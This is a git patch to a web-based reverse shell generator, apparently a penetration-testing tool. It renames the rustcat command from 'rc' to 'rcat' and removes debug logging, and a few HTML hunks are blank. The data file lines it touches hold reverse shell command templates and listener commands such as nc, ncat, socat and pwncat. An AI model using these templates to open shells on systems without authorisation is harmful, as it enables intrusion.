From 8efd307ac79b97ebde1e454ed95ec8994e3fc8bf Mon Sep 17 00:00:00 2001 From: robiot Date: Sun, 3 Oct 2021 11:43:55 +0300 Subject: [PATCH] Rc -> Rcat & Fixes --- index.html | 8 ++++---- js/data.js | 6 +++--- js/light-mode-switch.js | 2 -- 3 files changed, 7 insertions(+), 9 deletions(-) diff --git a/index.html b/index.html index 6b2248f..88dfd1a 100644 --- a/index.html +++ b/index.html @@ -148,7 +148,7 @@
🚀
-

                                 
@@ -247,7 +247,7 @@
🚀

                                         
@@ -351,7 +351,7 @@
🚀
-

                                         
@@ -407,7 +407,7 @@
🚀

                                             
diff --git a/js/data.js b/js/data.js index f54c7d6..c7dab10 100644 --- a/js/data.js +++ b/js/data.js @@ -81,7 +81,7 @@ const reverseShellCommands = withCommandType( }, { "name": "rustcat", - "command": "rc {ip} {port} -r {shell}", + "command": "rcat {ip} {port} -r {shell}", "meta": ["linux", "mac"] }, { @@ -420,8 +420,8 @@ const rsgData = { ['ncat', 'ncat -lvnp {port}'], ['ncat (TLS)', 'ncat --ssl -lvnp {port}'], ['rlwrap + nc', 'rlwrap -cAr nc -lvnp {port}'], - ['rc', 'rc -lp {port}'], - ['rc + Command History', 'rc -lHp {port}'], + ['rustcat', 'rcat -lp {port}'], + ['rustcat + Command History', 'rcat -lHp {port}'], ['pwncat', 'python3 -m pwncat -lp {port}'], ['windows ConPty', 'stty raw -echo; (stty size; cat) | nc -lvnp {port}'], ['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'], diff --git a/js/light-mode-switch.js b/js/light-mode-switch.js index 512833a..6415ab1 100644 --- a/js/light-mode-switch.js +++ b/js/light-mode-switch.js @@ -25,7 +25,6 @@ function initTheme() { if (currentTheme == null) { document.body.removeAttribute("data-theme") } else { - console.log("there") document.body.setAttribute("data-theme", currentTheme) $("#theme-selector").val(currentTheme).change(); } @@ -38,7 +37,6 @@ function initTheme() { * @return {void} */ function resetTheme(currentTheme) { - console.log(currentTheme) if (currentTheme !== "dark") { document.body.setAttribute("data-theme", currentTheme); localStorage.setItem("currentTheme", currentTheme);